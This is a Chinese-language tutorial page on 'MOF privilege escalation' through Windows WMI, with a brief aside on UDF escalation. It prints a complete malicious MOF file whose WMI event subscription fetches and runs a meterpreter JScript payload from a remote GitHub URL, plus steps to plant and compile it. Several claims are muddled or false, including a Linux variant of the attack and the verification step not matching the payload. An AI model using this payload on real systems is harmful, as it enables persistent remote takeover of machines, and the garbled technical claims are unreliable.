您的位置:

Mof提权攻击详解

一、Mof提权程序全称

Mof是一种特殊的WMI(Windows Management Instrumentation)格式,可以被用于执行特定的操作,例如创建永久性的后门、隐藏文件和执行命令等。Mof提权程序是利用Mof文件格式以及WMI服务漏洞实现的一种Windows系统提权攻击。

攻击者可以通过Mof文件将恶意代码写入系统中,然后利用WMI服务解析Mof文件并执行其中的代码,最终实现对系统进行提权操作。一旦攻击成功,攻击者就可以获得系统管理员权限,从而完全控制受害计算机。

二、UDF提权

除了Mof提权外,另一种常见的Windows系统提权攻击技术是UDF(User Defined Functions)提权。UDF提权攻击是利用一种特殊的SQL Server User Defined Function函数漏洞,通过创建恶意函数并执行,最终获得SYSTEM管理员权限。

与Mof提权不同的是,UDF提权使用的是SQL Server数据库服务中的特定漏洞,而不是WMI服务的漏洞。因此,它只能在安装了SQL Server的Windows系统上实现提权攻击。

三、Mof提权步骤

1、编写恶意Mof文件

#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $Filter
{
    EventNamespace = "Root\\Cimv2";
    Name  = "filtP1";
    QueryLanguage  = "WQL";
    Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA \"Win32_LocalTime\" AND TargetInstance.Second = 59";
};
instance of ActiveScriptEventConsumer as $Cons
{
    ScriptingEngine    = "JScript";
    ScriptText  = "GetObject(\"script:https://raw.githubusercontent.com/xxx/xxx/master/meterpreter/jscript/meterpreter.js\").run()";
};
instance of __FilterToConsumerBinding
{
    Consumer   = $Cons;
    Filter = $Filter;
};

以上是一个基本的Mof文件编写方法,在布控的时候,代码被例行检查和但会全部过关。

2、布控Mof文件

将Mof文件放置在指定目录下,如下所示:

C:\Windows\System32\wbem\mof\evil.mof

然后打开命令提示符,在管理员权限下输入以下命令来下载该Mof文件以及更新WMI类定义:

mofcomp evil.mof

3、验证攻击是否成功

当攻击者成功执行上述步骤后,可以通过以下命令来检查攻击是否成功:

net localgroup administrators

如果攻击成功,会发现攻击者被添加到系统管理员组中。

四、Mof提权 Linux

除了可以在Windows系统上实现Mof提权攻击外,攻击者还可以在Linux系统上利用Mof文件格式漏洞实现提权攻击。

类似于Windows系统,攻击者需要编写恶意Mof文件,并将其放置在Linux系统的特定目录下。然后,攻击者需要执行以下命令将Mof文件编译成二进制文件:

sudo mofcomp evil.mof -o /dev/null

此后,攻击者就可以利用提权后的权限执行任意命令和操作了。

总结

通过以上分析可以看出,Mof提权攻击利用了WMI服务漏洞,攻击者可以编写恶意的Mof文件,将其放置在Windows系统的特定目录下,然后利用WMI服务解析执行其中的恶意代码,最终实现对系统的提权操作。防范Mof提权攻击的最好方法是及时升级并维护系统。